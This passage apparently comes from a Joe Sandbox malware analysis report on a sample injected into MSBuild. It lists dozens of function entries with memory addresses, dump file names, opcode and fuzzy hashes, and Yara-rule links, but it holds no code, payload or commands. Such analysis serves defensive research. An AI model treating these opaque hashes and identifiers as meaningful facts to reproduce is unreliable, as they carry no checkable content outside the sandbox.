                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 30769c5126fab766008213a08127290b9740d8bb593327ce93a898c51d6f2b25
                                                                                                                                                                                                                                                                  • Instruction ID: d6667eba990ff5222f80ad8043c01f54a6ea1b93ed7a146b8f29b816022b9d9d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 30769c5126fab766008213a08127290b9740d8bb593327ce93a898c51d6f2b25
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6041D031901219DBDB18DF98C480AEFB7B5BF48718F14815AFA19FBA40E7349D45CBA4
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0138D534 Relevance: .1, Instructions: 138COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 853a9788fa5b559db611005eeed7c3082ce832e94517c07d520ecd2821328421
                                                                                                                                                                                                                                                                  • Instruction ID: 2d0225bbc53b6ae2ca57686cfaea4eb0402010895dd837ae244845967b5af201
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 853a9788fa5b559db611005eeed7c3082ce832e94517c07d520ecd2821328421
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4051BC322047A5CFDB22DB5DC448B2A77E5BB44B68F0904AAF841CBAD1D734DC45CAA1
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 01386154 Relevance: .1, Instructions: 133COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 96b5013aa41eff8d358a590251421a9007ad6c4720aaa913d5bfb3af6d02d420
                                                                                                                                                                                                                                                                  • Instruction ID: 32cd9a84920eec8743e1534e7b3b8221115242d8acb138764a2431bd9147dc64
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 96b5013aa41eff8d358a590251421a9007ad6c4720aaa913d5bfb3af6d02d420
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BE51E5B0A0071ADBEB259B28CC05BE9BBB5EF1131CF1482E9E529A76D1D7749981CF40
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0137B136 Relevance: .1, Instructions: 131COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: d52a5ce94ea3c9f1f0b3dda90166cffffcc2f8fa2ab8a7cacca2709612bef385
                                                                                                                                                                                                                                                                  • Instruction ID: dc0a52d7b28535822f63fc55ebe9e669115429a7b39ac7f09161dd04180892c6
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d52a5ce94ea3c9f1f0b3dda90166cffffcc2f8fa2ab8a7cacca2709612bef385
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E241CFB1641606EFDB22AF6DD880B6AFBF8EF5079CF004469E615DB660E774D800CB50
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0144F0E0 Relevance: .1, Instructions: 129COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: e5a73ab1a07dce526672faae845dbafcfd84bc99a2770d70fb65071dff654185
                                                                                                                                                                                                                                                                  • Instruction ID: 8f779c9a7f5390452d19f79153f2d71350bddab60cdae1a6988ed81db88d9294
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e5a73ab1a07dce526672faae845dbafcfd84bc99a2770d70fb65071dff654185
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4A41CD712083418FE714CF29D8A587BBBE1FBC4625F05895EF8958B392CB30D819CBA1
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0142D5B0 Relevance: .1, Instructions: 128COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 140324be64cfb1acea5905cd842a627a065b1df20844a5e562e78e1d4360b843
                                                                                                                                                                                                                                                                  • Instruction ID: e1cf368d73fcc09625bab94027f2508347f01aba985881781456d3b234608172
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 140324be64cfb1acea5905cd842a627a065b1df20844a5e562e78e1d4360b843
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B9412230E082A59FDB24CFA9C4857BAFBF1EF59300F45848AD1C98B356C735A496DB60
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013AA470 Relevance: .1, Instructions: 127COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: d420158bdd94a723e6ddafde9f21471805c899da37f1dc9e312ef0713361fcf6
                                                                                                                                                                                                                                                                  • Instruction ID: 5284c103180cf4c542ca84359494714e7c2e303b6b5abb30ffed9cae764f9d9a
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d420158bdd94a723e6ddafde9f21471805c899da37f1dc9e312ef0713361fcf6
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4841AC32940219CFDB25DF6CC8987AA7BB4FB18358F580169D451BB2A1DB349940CBA4
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0137A020 Relevance: .1, Instructions: 122COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                                                                                                                                                                                  • Instruction ID: a03fe71ebf102437f7bb45fb8d748e31af0fe04a6f2e71b017c1facba34fa687
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D4418032A04215DBDF32DE2D94407BEF7B9EB5175CF1A80AAE9449B244D63B8D44CB90
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0144FFB1 Relevance: .1, Instructions: 117COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 4b788d5ea03d1e502c3f09d85a9956445a48a6a441e76f437f5626c2cf97ccdd
                                                                                                                                                                                                                                                                  • Instruction ID: 0d41796abe200131298a3a39320d730c9fce035bddf5c22b3a4d3b381c8c3b0e
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4b788d5ea03d1e502c3f09d85a9956445a48a6a441e76f437f5626c2cf97ccdd
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CC417AB56001559FD750CB2A94B06BBFFF2AF85705F0E80AAED81AB386D639C416C770
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0144FA49 Relevance: .1, Instructions: 113COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 5d228e55bcfb2096b77cb585cf2e5fa10c8b8d909aad4a92e396045de3fac7be
                                                                                                                                                                                                                                                                  • Instruction ID: 4de82924829855ba5179e111678c74dc5b459a0319f05860e9633c81cc8de6c2
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5d228e55bcfb2096b77cb585cf2e5fa10c8b8d909aad4a92e396045de3fac7be
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F4314B327101069BF718CE2DCC44AB77B96EF95354F08853AEA18CB3A5E774D949C394
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0144EEDB Relevance: .1, Instructions: 113COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: e9de1cbf70d649a4d66cfafabb62b70edf66af66f0b1737455f5b796645fd411
                                                                                                                                                                                                                                                                  • Instruction ID: ae761a87da5276a58c14ffaee8a411d438fceccbacefc5234c25560ec577c41d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e9de1cbf70d649a4d66cfafabb62b70edf66af66f0b1737455f5b796645fd411
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C441A233E1402ADBDB18CF68D49157AB7F1FF8830475A42BED905AB2A5DB34AD05CB90
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 014005A7 Relevance: .1, Instructions: 111COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 7cf397f4c08fbb89461c441c9e3acc2740e04618bf0d0945a7fd8250b75bf85d
                                                                                                                                                                                                                                                                  • Instruction ID: 61fa7f254ef3bf13d0a074a39b3383a4ab3206033f310c80d75750256c284e91
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7cf397f4c08fbb89461c441c9e3acc2740e04618bf0d0945a7fd8250b75bf85d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9C41D2725046419BC321DF6DC840B6BB7A5BFC8740F144A2EF95887690E730E904C7A6
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0144FB76 Relevance: .1, Instructions: 109COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: aefe69fe51bb88c03db4c40bc8d3be7be4aa72c4e48e20255a484299ed8ec57e
                                                                                                                                                                                                                                                                  • Instruction ID: 0b82717f9509e0fe030268219c28344e512e7d68e862963f93f470612e74e7eb
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aefe69fe51bb88c03db4c40bc8d3be7be4aa72c4e48e20255a484299ed8ec57e
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8431D232A10506ABF7148F6DCD44AABBBE6FF99350F05852AF908CF261DA34E905C794
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 00401030 Relevance: .1, Instructions: 108COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                                                                                                                                                                                                                                                                  • Instruction ID: 9ce4faf4bd6c29c48d5e9242fd1ccb7de96948774e055271f7c113e60250bd75
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 203180116596F10ED30E836D08BDA75AEC18E9720174EC2FEDADA6F2F3C0888408D3A5
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013902E1 Relevance: .1, Instructions: 106COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                  • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                                                                                                                                                                                                  • Instruction ID: 1b427dcf8ebd9b4436e82c728737600d50e1786a998d0a728abfcf6d1335b402
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 31310031A00248ABDF269B7CCC84B9FBFECAF14358F0441A6F855D7292C7749884CBA0
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013A9274 Relevance: .1, Instructions: 105COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                  • Opcode ID: dab239d697188bc7e65789f16f72c74021cd18c80654cec567354c3b946b7a53
                                                                                                                                                                                                                                                                  • Instruction ID: 9135430123c8a8cd5c199dfd79cdf74a483f34545c9165f6bc0ab16c8110a947
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dab239d697188bc7e65789f16f72c74021cd18c80654cec567354c3b946b7a53
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0E318275A0162DAFDF21CB68CC40B9ABBB9EF86718F5501D9A54CA72C0DB309D84CF51
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 01384260 Relevance: .1, Instructions: 102COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 231783676c988eae14589ff6b96557bcdde418acf071081a553bae7efd1ba7c7
                                                                                                                                                                                                                                                                  • Instruction ID: d53930caa5ce376ba7b7183179d05941f671c4564bd0159597a798c5899f447e
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 231783676c988eae14589ff6b96557bcdde418acf071081a553bae7efd1ba7c7
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AC41BF71200B46DFDB26DF28C484FD67BE9AF54718F05842DEA998B690C7B4E804CB90
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013A50E4 Relevance: .1, Instructions: 101COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 9736ef1e2d2fe6ed3e8edd6ff05ccc53a0216fb05e956db353e68a80ecb75403
                                                                                                                                                                                                                                                                  • Instruction ID: d22b6b0367dcc1ddce07af07877097dd42ce990349c0415859e7106c66f1c2cb
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9736ef1e2d2fe6ed3e8edd6ff05ccc53a0216fb05e956db353e68a80ecb75403
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 213106316083469BEF22DA2CC800777BBD9EB85758F88812AF585CB795D278D841C792
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 014461C3 Relevance: .1, Instructions: 97COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: a6edec50456c9a287e7567acc023f48a067205f1db7d714b8214dcdc1b8b996b
                                                                                                                                                                                                                                                                  • Instruction ID: c2e8fb95e7617bb57e4b0b2f4d598becc2ad8871eefa5d03eeeac7cc622fb49b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a6edec50456c9a287e7567acc023f48a067205f1db7d714b8214dcdc1b8b996b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0631E475A00116BBEB15DF98CC40BAEB7B5FB45B44F454169E904EB254D770ED40CB90
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 01446BD7 Relevance: .1, Instructions: 96COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: f6125edf27e9617c24e3442c6451e5f7365774afe551451553e56803e8f78730
                                                                                                                                                                                                                                                                  • Instruction ID: a56426b3bd43472b7f1196b8ccf6211e344b169be6a465a3b27fb3d3d7c1a84e
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f6125edf27e9617c24e3442c6451e5f7365774afe551451553e56803e8f78730
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 62316B71B002049FDB24CF2DD9C5A5B7BE4FF49344F8684AAE908DF259D270E949CBA4
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 014460B8 Relevance: .1, Instructions: 95COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 9209ecf04d8c7ec43c2b087bfa5eadf8ac6e3509f0784605b01c8df2c2038da0
                                                                                                                                                                                                                                                                  • Instruction ID: fb4d54b0b75b2002d0ec755befa1f42c730d99c7c6f0d56fc6baee2dd5bed6be
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9209ecf04d8c7ec43c2b087bfa5eadf8ac6e3509f0784605b01c8df2c2038da0
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3131E571B00606EFEB229FADC850BABB7B9AF45754F15406FE509DB362DA30DC018B90
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 01388550 Relevance: .1, Instructions: 94COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 1f728f1acd20e38a0f55a313d7580fda8598def61d308428e0541767ce322e66
                                                                                                                                                                                                                                                                  • Instruction ID: 5db573cb7163d0fd0d77d73130afc592522ce9113ce0667aa2aa9799b5211c00
